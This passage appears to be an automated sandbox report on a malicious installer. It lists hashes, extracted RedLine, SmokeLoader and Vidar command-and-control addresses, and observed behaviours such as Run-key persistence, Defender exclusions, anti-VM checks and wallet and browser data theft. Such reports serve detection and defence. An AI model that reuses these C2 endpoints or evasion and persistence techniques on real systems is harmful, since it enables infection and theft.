Resubmissions
02-11-2021 06:54
211102-hpn1zsbhc2 1002-11-2021 06:42
211102-hgpmjsgggp 1001-11-2021 21:47
211101-1ncknsfgfm 10Analysis
-
max time kernel
4547s -
max time network
26861s -
platform
windows10_x64 -
resource
win10-en-20211014 -
submitted
01-11-2021 21:47
Static task
static1
Behavioral task
behavioral1
Sample
setup_x86_x64_install.exe
Resource
win7-ja-20210920
Behavioral task
behavioral2
Sample
setup_x86_x64_install.exe
Resource
win7-en-20211014
Behavioral task
behavioral3
Sample
setup_x86_x64_install.exe
Resource
win7-de-20210920
Behavioral task
behavioral4
Sample
setup_x86_x64_install.exe
Resource
win11
Behavioral task
behavioral5
Sample
setup_x86_x64_install.exe
Resource
win10-ja-20211014
General
-
Target
setup_x86_x64_install.exe
-
Size
4.2MB
-
MD5
b5b5fe52ed9ca7d47bfb857498fd684c
-
SHA1
9c17089a630141c9b4e13ef46ab334d46709fdb8
-
SHA256
6cbb4380d880c6bab221c81122b32e225ebf224942191fb08df5df82f971864b
-
SHA512
482de7cacf73eb37050e323312b05d3d5d2152048efa5defa4b3d8687f6b3355233d8bf3f04d6107a7214f4b21e4f81f83313ecaf3bdcda98c7d95d60a41e79a
Malware Config
Extracted
redline
media0121
91.121.67.60:23325
Extracted
redline
newjust
135.181.129.119:4805
Extracted
smokeloader
2020
http://brandyjaggers.com/upload/
http://andbal.com/upload/
http://alotofquotes.com/upload/
http://szpnc.cn/upload/
http://uggeboots.com/upload/
http://100klv.com/upload/
http://rapmusic.at/upload/
Extracted
vidar
41.6
933
https://mas.to/@lilocc
-
profile_id
933
Signatures
-
Process spawned unexpected child process 7 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
rundll32.exerundll32.exerundll32.exerundll32.exerundll32.exerundll32.exerundll32.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 6644 388 rundll32.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 8060 388 rundll32.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 8240 388 rundll32.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1200 388 rundll32.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 6308 388 rundll32.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 6368 388 rundll32.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 8296 388 rundll32.exe -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 4 IoCs
Processes:
resource yara_rule behavioral6/memory/1164-266-0x0000000000400000-0x0000000000420000-memory.dmp family_redline behavioral6/memory/1164-267-0x0000000000418D26-mapping.dmp family_redline behavioral6/memory/2420-291-0x0000000000418D3A-mapping.dmp family_redline behavioral6/memory/2420-290-0x0000000000400000-0x0000000000420000-memory.dmp family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Socelars Payload 2 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\7zSCB23D1E5\Mon17870faab0.exe family_socelars C:\Users\Admin\AppData\Local\Temp\7zSCB23D1E5\Mon17870faab0.exe family_socelars -
Suspicious use of NtCreateProcessExOtherParentProcess 4 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exedescription pid process target process PID 4816 created 1652 4816 WerFault.exe Mon1708beae021a5ff.exe PID 4496 created 5284 4496 WerFault.exe UDl5MrZhovzJ9aalPEClXxwq.exe PID 4892 created 1520 4892 WerFault.exe Mon17bffc2992eb3d.exe PID 5540 created 2392 5540 WerFault.exe setup.exe -
suricata: ET MALWARE ClipBanker Variant Activity (POST)
suricata: ET MALWARE ClipBanker Variant Activity (POST)
-
suricata: ET MALWARE FormBook CnC Checkin (GET)
suricata: ET MALWARE FormBook CnC Checkin (GET)
-
suricata: ET MALWARE FormBook CnC Checkin (POST) M2
suricata: ET MALWARE FormBook CnC Checkin (POST) M2
-
suricata: ET MALWARE GCleaner Downloader Activity M5
suricata: ET MALWARE GCleaner Downloader Activity M5
-
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
-
suricata: ET MALWARE Win32/Adware.Agent.NSU CnC Activity
suricata: ET MALWARE Win32/Adware.Agent.NSU CnC Activity
-
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin
-
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2
-
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Vidar Stealer 2 IoCs
Processes:
resource yara_rule behavioral6/memory/4704-481-0x0000000002210000-0x00000000022E6000-memory.dmp family_vidar behavioral6/memory/4704-484-0x0000000000400000-0x00000000004D9000-memory.dmp family_vidar -
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\7zSCB23D1E5\libcurlpp.dll aspack_v212_v242 \Users\Admin\AppData\Local\Temp\7zSCB23D1E5\libcurlpp.dll aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zSCB23D1E5\libcurl.dll aspack_v212_v242 \Users\Admin\AppData\Local\Temp\7zSCB23D1E5\libcurl.dll aspack_v212_v242 \Users\Admin\AppData\Local\Temp\7zSCB23D1E5\libcurl.dll aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zSCB23D1E5\libstdc++-6.dll aspack_v212_v242 \Users\Admin\AppData\Local\Temp\7zSCB23D1E5\libstdc++-6.dll aspack_v212_v242 -
Adds policy Run key to start application 2 TTPs 2 IoCs
Processes:
cscript.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run cscript.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\ETHHFTBPMR4 = "C:\\Program Files (x86)\\X_r3\\ms9r_l_r.exe" cscript.exe -
Blocklisted process makes network request 64 IoCs
Processes:
mshta.execmd.exerundll32.execscript.exeMsiExec.exeflow pid process 255 4588 mshta.exe 256 4588 mshta.exe 257 4588 mshta.exe 260 4588 mshta.exe 271 4588 mshta.exe 272 4588 mshta.exe 273 4588 mshta.exe 274 4588 mshta.exe 306 5192 cmd.exe 475 6368 rundll32.exe 511 6368 rundll32.exe 520 6368 rundll32.exe 526 6368 rundll32.exe 526 6368 rundll32.exe 625 6368 rundll32.exe 511 6368 rundll32.exe 520 6368 rundll32.exe 693 6072 cscript.exe 704 6072 cscript.exe 708 8020 MsiExec.exe 711 8020 MsiExec.exe 712 8020 MsiExec.exe 713 8020 MsiExec.exe 714 8020 MsiExec.exe 715 8020 MsiExec.exe 716 8020 MsiExec.exe 717 8020 MsiExec.exe 718 8020 MsiExec.exe 719 8020 MsiExec.exe 720 8020 MsiExec.exe 721 8020 MsiExec.exe 722 8020 MsiExec.exe 723 8020 MsiExec.exe 727 8020 MsiExec.exe 729 8020 MsiExec.exe 730 8020 MsiExec.exe 731 8020 MsiExec.exe 732 8020 MsiExec.exe 733 8020 MsiExec.exe 734 8020 MsiExec.exe 735 8020 MsiExec.exe 736 8020 MsiExec.exe 737 8020 MsiExec.exe 738 8020 MsiExec.exe 739 8020 MsiExec.exe 740 8020 MsiExec.exe 741 8020 MsiExec.exe 742 8020 MsiExec.exe 743 8020 MsiExec.exe 744 8020 MsiExec.exe 747 8020 MsiExec.exe 749 8020 MsiExec.exe 751 8020 MsiExec.exe 752 8020 MsiExec.exe 753 8020 MsiExec.exe 754 8020 MsiExec.exe 755 8020 MsiExec.exe 756 8020 MsiExec.exe 757 8020 MsiExec.exe 758 8020 MsiExec.exe 759 8020 MsiExec.exe 760 8020 MsiExec.exe 761 8020 MsiExec.exe 762 8020 MsiExec.exe -
Downloads MZ/PE file
-
Drops file in Drivers directory 2 IoCs
Processes:
DYbALA.exeConhost.exedescription ioc process File opened for modification C:\Windows\system32\drivers\etc\hosts DYbALA.exe File opened for modification C:\Windows\system32\drivers\etc\hosts Conhost.exe -
Executes dropped EXE 64 IoCs
Processes:
setup_installer.exesetup_install.exeMon178e7a516181.exeMon179f74c0ff3cf1f.exeMon17870faab0.exeMon17bffc2992eb3d.exeMon1727c156c4abcec.exeMon175e6c8b40064b8c8.exeMon173a360b525.exeMon1727c156c4abcec.exeMon17332e41e6b.exeMon17bbf11fdb575d.exeMon174a6c5f1664f.exeMon1708beae021a5ff.exeMon178d8e5d06822.exeMon17bbf11fdb575d.tmpMon17a0d8ec302e.exeMon17afe24e0084db3.exeMon17bbf11fdb575d.exeMon17bbf11fdb575d.tmpmshta.exeMon174a6c5f1664f.exeMon1727c156c4abcec.exe5431899.exe671081.execmd.exepostback.exe520258.exeDownFlSetup110.exeinst1.exe7540508.exeSoft1WW01.exechrome.exe5667762.exechrome2.exe5824839.exe5952231.exesearch_hyperfs_206.exesetup.exeLesavaeshiky.exeConhost.exechrome3.exe6831137645.exeKWw_Na9PoK6E2at8khQXjitr.exeChrome5.exeN9N76vYxukkwQD1CI_UpvR65.exeWinHoster.exemshta.exeO7nom3SDxJGlpV8eVKOY1Zzv.tmp110301.exexR3OQ2Qh_z7R_Ve5A7amjTnU.execmd.exepQnAbYmg3ChB2IJbQyaavv5U.exeany.exeW30vm3LUtOHOLL7zBnVYdAYg.exezOSiw22fXWUlLyCSO8v9nq6z.execewNSWFaXogGyGjuphJS2DKK.exeAAsjqRognrs5OHbgENK9auj7.exe6Dc4QkJcH_bc6k4XPPf58CgI.exeUDl5MrZhovzJ9aalPEClXxwq.exe8t8B84uCRSWE3mwZuTRWxKhE.exeROKEqOhVK1b69uHCUbon1CXS.exetaskkill.exeMQEVvxj7hZPEIbDsVozLP91D.exepid process 700 setup_installer.exe 3852 setup_install.exe 944 Mon178e7a516181.exe 884 Mon179f74c0ff3cf1f.exe 1048 Mon17870faab0.exe 1520 Mon17bffc2992eb3d.exe 1908 Mon1727c156c4abcec.exe 2004 Mon175e6c8b40064b8c8.exe 3096 Mon173a360b525.exe 2104 Mon1727c156c4abcec.exe 2288 Mon17332e41e6b.exe 2724 Mon17bbf11fdb575d.exe 1560 Mon174a6c5f1664f.exe 1652 Mon1708beae021a5ff.exe 1552 Mon178d8e5d06822.exe 1060 Mon17bbf11fdb575d.tmp 2300 Mon17a0d8ec302e.exe 2924 Mon17afe24e0084db3.exe 3340 Mon17bbf11fdb575d.exe 3988 Mon17bbf11fdb575d.tmp 1908 mshta.exe 1164 Mon174a6c5f1664f.exe 2420 Mon1727c156c4abcec.exe 2868 5431899.exe 4120 671081.exe 4112 cmd.exe 4208 postback.exe 4380 520258.exe 4452 DownFlSetup110.exe 4568 inst1.exe 4636 7540508.exe 4704 Soft1WW01.exe 4796 chrome.exe 4880 5667762.exe 4968 chrome2.exe 5008 5824839.exe 2452 5952231.exe 3080 search_hyperfs_206.exe 2392 setup.exe 4604 Lesavaeshiky.exe 4844 Conhost.exe 4712 chrome3.exe 2432 6831137645.exe 516 KWw_Na9PoK6E2at8khQXjitr.exe 1560 Chrome5.exe 4700 N9N76vYxukkwQD1CI_UpvR65.exe 4696 WinHoster.exe 4588 mshta.exe 4524 O7nom3SDxJGlpV8eVKOY1Zzv.tmp 5128 110301.exe 5184 xR3OQ2Qh_z7R_Ve5A7amjTnU.exe 5192 cmd.exe 5200 pQnAbYmg3ChB2IJbQyaavv5U.exe 5208 any.exe 5216 W30vm3LUtOHOLL7zBnVYdAYg.exe 5228 zOSiw22fXWUlLyCSO8v9nq6z.exe 5168 cewNSWFaXogGyGjuphJS2DKK.exe 5176 AAsjqRognrs5OHbgENK9auj7.exe 5276 6Dc4QkJcH_bc6k4XPPf58CgI.exe 5284 UDl5MrZhovzJ9aalPEClXxwq.exe 5292 8t8B84uCRSWE3mwZuTRWxKhE.exe 5352 ROKEqOhVK1b69uHCUbon1CXS.exe 5368 taskkill.exe 5420 MQEVvxj7hZPEIbDsVozLP91D.exe -
Checks BIOS information in registry 2 TTPs 20 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
6Dc4QkJcH_bc6k4XPPf58CgI.exe8308170.exeUDl5MrZhovzJ9aalPEClXxwq.execewNSWFaXogGyGjuphJS2DKK.exeROKEqOhVK1b69uHCUbon1CXS.exeemLR1yBnJXWqQ4WeiAVEpVDR.exe8t8B84uCRSWE3mwZuTRWxKhE.exe520258.exe7540508.exe3258372.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 6Dc4QkJcH_bc6k4XPPf58CgI.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 8308170.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion UDl5MrZhovzJ9aalPEClXxwq.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion cewNSWFaXogGyGjuphJS2DKK.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion ROKEqOhVK1b69uHCUbon1CXS.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion emLR1yBnJXWqQ4WeiAVEpVDR.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion ROKEqOhVK1b69uHCUbon1CXS.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 8t8B84uCRSWE3mwZuTRWxKhE.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 520258.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 7540508.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 7540508.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion UDl5MrZhovzJ9aalPEClXxwq.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 6Dc4QkJcH_bc6k4XPPf58CgI.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 3258372.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 8t8B84uCRSWE3mwZuTRWxKhE.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 8308170.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 520258.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion cewNSWFaXogGyGjuphJS2DKK.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 3258372.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion emLR1yBnJXWqQ4WeiAVEpVDR.exe -
Checks computer location settings 2 TTPs 8 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
Lesavaeshiky.exeCalculator.exeCalculator.exeCalculator.exeMon178e7a516181.exeMon179f74c0ff3cf1f.exeplnTHKl8cQG5waAHP2YJZuCW.exeUWZiUOJl0LZG66f2pahI0uWq.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Control Panel\International\Geo\Nation Lesavaeshiky.exe Key value queried \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Control Panel\International\Geo\Nation Calculator.exe Key value queried \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Control Panel\International\Geo\Nation Calculator.exe Key value queried \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Control Panel\International\Geo\Nation Calculator.exe Key value queried \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Control Panel\International\Geo\Nation Mon178e7a516181.exe Key value queried \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Control Panel\International\Geo\Nation Mon179f74c0ff3cf1f.exe Key value queried \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Control Panel\International\Geo\Nation plnTHKl8cQG5waAHP2YJZuCW.exe Key value queried \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Control Panel\International\Geo\Nation UWZiUOJl0LZG66f2pahI0uWq.exe -
Loads dropped DLL 64 IoCs
Processes:
setup_install.exeMon17bbf11fdb575d.tmpMon17bbf11fdb575d.tmpConhost.exeregsvr32.exerundll32.exesetup.exerundll32.exeregsvr32.exemsiexec.exemsiexec.exerundll32.exezrT3_FY7dpLO8jDjzi1ZJ8Pj.exeO7nom3SDxJGlpV8eVKOY1Zzv.tmpsetup.exeO7nom3SDxJGlpV8eVKOY1Zzv.tmpmsiexec.exesetup.exemsiexec.exeinstaller.exeCalculator.exeautosubplayer.exeautosubplayer.exeCalculator.exepid process 3852 setup_install.exe 3852 setup_install.exe 3852 setup_install.exe 3852 setup_install.exe 3852 setup_install.exe 3852 setup_install.exe 3852 setup_install.exe 3852 setup_install.exe 1060 Mon17bbf11fdb575d.tmp 3988 Mon17bbf11fdb575d.tmp 4844 Conhost.exe 4844 Conhost.exe 4844 Conhost.exe 4844 Conhost.exe 4844 Conhost.exe 5052 regsvr32.exe 7048 rundll32.exe 4724 setup.exe 4724 setup.exe 8092 rundll32.exe 7620 regsvr32.exe 7620 regsvr32.exe 2200 msiexec.exe 2200 msiexec.exe 3272 msiexec.exe 3272 msiexec.exe 6368 rundll32.exe 6368 rundll32.exe 4256 zrT3_FY7dpLO8jDjzi1ZJ8Pj.exe 4256 zrT3_FY7dpLO8jDjzi1ZJ8Pj.exe 4256 zrT3_FY7dpLO8jDjzi1ZJ8Pj.exe 4256 zrT3_FY7dpLO8jDjzi1ZJ8Pj.exe 4256 zrT3_FY7dpLO8jDjzi1ZJ8Pj.exe 888 O7nom3SDxJGlpV8eVKOY1Zzv.tmp 6732 setup.exe 6732 setup.exe 4724 setup.exe 4724 setup.exe 4724 setup.exe 4524 O7nom3SDxJGlpV8eVKOY1Zzv.tmp 4724 setup.exe 6368 rundll32.exe 4844 Conhost.exe 6368 rundll32.exe 6368 rundll32.exe 5668 msiexec.exe 5668 msiexec.exe 5536 setup.exe 5536 setup.exe 7832 msiexec.exe 7832 msiexec.exe 6732 setup.exe 7880 installer.exe 7880 installer.exe 6732 setup.exe 1416 Calculator.exe 6732 setup.exe 1052 autosubplayer.exe 1416 Calculator.exe 1416 Calculator.exe 6732 setup.exe 4256 zrT3_FY7dpLO8jDjzi1ZJ8Pj.exe 6532 autosubplayer.exe 5752 Calculator.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
rundll32.exerundll32.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\IuWtIecd = "0" rundll32.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\TEMP\ = "0" rundll32.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\IuWtIecd = "0" rundll32.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\TEMP\ = "0" rundll32.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 8 IoCs
Processes:
setup.exesetup.exe5824839.exesetup.exeDYbALA.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Calculator = "C:\\Users\\Admin\\AppData\\Roaming\\Calculator\\Calculator.exe --ZgwMku75" setup.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run setup.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Calculator = "C:\\Users\\Admin\\AppData\\Roaming\\Calculator\\Calculator.exe --ZgwMku75" setup.exe Set value (str) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinHost = "C:\\Users\\Admin\\AppData\\Roaming\\WinHost\\WinHoster.exe" 5824839.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run setup.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Calculator = "C:\\Users\\Admin\\AppData\\Roaming\\Calculator\\Calculator.exe --ZgwMku75" setup.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\WindowsPowerShell\\Xymyshywago.exe\"" DYbALA.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run setup.exe -
Checks for any installed AV software in registry 1 TTPs 2 IoCs
Processes:
powershell.exepowershell.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\SOFTWARE\KasperskyLab powershell.exe Key opened \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\SOFTWARE\KasperskyLab powershell.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Processes:
rundll32.exeROKEqOhVK1b69uHCUbon1CXS.exe8t8B84uCRSWE3mwZuTRWxKhE.exejg1_1faf.execewNSWFaXogGyGjuphJS2DKK.exe6Dc4QkJcH_bc6k4XPPf58CgI.exe3258372.exeemLR1yBnJXWqQ4WeiAVEpVDR.exe8308170.exe520258.exe7540508.exeUDl5MrZhovzJ9aalPEClXxwq.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA rundll32.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA ROKEqOhVK1b69uHCUbon1CXS.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 8t8B84uCRSWE3mwZuTRWxKhE.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA jg1_1faf.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA cewNSWFaXogGyGjuphJS2DKK.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 6Dc4QkJcH_bc6k4XPPf58CgI.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 3258372.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA emLR1yBnJXWqQ4WeiAVEpVDR.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 8308170.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 520258.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 7540508.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA UDl5MrZhovzJ9aalPEClXxwq.exe -
Enumerates connected drives 3 TTPs 64 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
installer.exemsiexec.exemsiexec.exeinstaller.exedescription ioc process File opened (read-only) \??\U: installer.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\Q: installer.exe File opened (read-only) \??\Z: installer.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\Q: installer.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\H: installer.exe File opened (read-only) \??\K: installer.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\I: installer.exe File opened (read-only) \??\K: installer.exe File opened (read-only) \??\S: installer.exe File opened (read-only) \??\Y: installer.exe File opened (read-only) \??\R: installer.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\W: installer.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\E: installer.exe File opened (read-only) \??\V: installer.exe File opened (read-only) \??\I: installer.exe File opened (read-only) \??\N: installer.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\F: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\P: installer.exe File opened (read-only) \??\W: installer.exe File opened (read-only) \??\X: installer.exe File opened (read-only) \??\Z: installer.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\Y: installer.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\B: installer.exe File opened (read-only) \??\G: installer.exe File opened (read-only) \??\F: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\T: installer.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\E: installer.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\L: installer.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\O: installer.exe File opened (read-only) \??\J: installer.exe File opened (read-only) \??\P: installer.exe File opened (read-only) \??\V: installer.exe File opened (read-only) \??\X: installer.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\I: msiexec.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 15 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 60 ipinfo.io 196 freegeoip.app 202 freegeoip.app 361 ipinfo.io 362 ipinfo.io 58 ipinfo.io 170 ip-api.com 215 freegeoip.app 268 ipinfo.io 57 ipinfo.io 260 ipinfo.io 201 freegeoip.app 259 ipinfo.io 363 ipinfo.io 1838 ip-api.com -
Drops file in System32 directory 35 IoCs
Processes:
rundll32.exerundll32.exesvchost.exesvchost.exerundll32.exerundll32.exedescription ioc process File created C:\Windows\System32\GroupPolicy\Machine\Registry.pol rundll32.exe File opened for modification C:\Windows\System32\GroupPolicy rundll32.exe File opened for modification C:\Windows\System32\GroupPolicy\GPT.INI rundll32.exe File opened for modification C:\Windows\System32\Tasks\AdvancedUpdater svchost.exe File opened for modification C:\Windows\System32\Tasks\AdvancedWindowsManager #2 svchost.exe File opened for modification C:\Windows\System32\GroupPolicy rundll32.exe File opened for modification C:\Windows\System32\GroupPolicy\gpt.ini rundll32.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\686AD3B12FDB68487AAEA92D0A823EB3 svchost.exe File opened for modification C:\Windows\System32\GroupPolicy\GPT.INI rundll32.exe File opened for modification C:\Windows\System32\GroupPolicy\gpt.ini rundll32.exe File opened for modification C:\Windows\System32\Tasks\AdvancedWindowsManager #1 svchost.exe File opened for modification C:\Windows\System32\Tasks\AdvancedWindowsManager #3 svchost.exe File opened for modification C:\Windows\System32\Tasks\AdvancedWindowsManager #5 svchost.exe File opened for modification C:\Windows\System32\Tasks\services64 svchost.exe File opened for modification C:\Windows\System32\GroupPolicy\gpt.ini rundll32.exe File opened for modification C:\Windows\System32\GroupPolicy\Machine\Registry.pol rundll32.exe File opened for modification C:\Windows\System32\Tasks\IuWtIecd svchost.exe File opened for modification C:\Windows\System32\GroupPolicy rundll32.exe File opened for modification C:\Windows\System32\Tasks\PowerControl LG svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\686AD3B12FDB68487AAEA92D0A823EB3 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27 svchost.exe File opened for modification C:\Windows\System32\Tasks\AdvancedWindowsManager #4 svchost.exe File opened for modification C:\Windows\System32\GroupPolicy\gpt.ini rundll32.exe File opened for modification C:\Windows\System32\Tasks\PowerControl HR svchost.exe File opened for modification C:\Windows\System32\GroupPolicy\Machine\Registry.pol rundll32.exe File opened for modification C:\Windows\System32\GroupPolicy\GPT.INI rundll32.exe File opened for modification C:\Windows\System32\GroupPolicy\Machine\Registry.pol rundll32.exe File opened for modification C:\Windows\System32\GroupPolicy\GPT.INI rundll32.exe File opened for modification 